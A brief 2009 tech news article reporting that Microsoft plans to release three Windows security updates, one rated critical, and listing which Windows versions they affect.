Microsoft plans to release three patches tomorrow
by Alex Hanea | 9 March 2009

The company announced on Friday that on 10 March it will make available three security updates, one of which is considered critical, for Windows 2000, Server 2003, XP, Server 2008 and Windows Vista. One of the patches is classified by Microsoft as alert level four, that is, "critical". If exploited, this "critical" problem can allow attackers to take control of computers without the users having to lift a finger. The other two patches are classified as "important", that is, risk level three, and they fix holes used by attackers to trick users into disclosing confidential information. Although the company has not disclosed details about the vulnerabilities covered by the patches to be released tomorrow, Microsoft has nevertheless acknowledged that these "critical" problems pose a risk to all Windows versions released so far, while one of the patches considered "important" does not affect the XP or Vista operating systems. The update comes less than a week after Microsoft referred to a patch for a "critical" vulnerability similar to the one fixed by tomorrow's patch, but that time in Excel. Office and other Microsoft products will not be "affected" by this operation launched by the American company.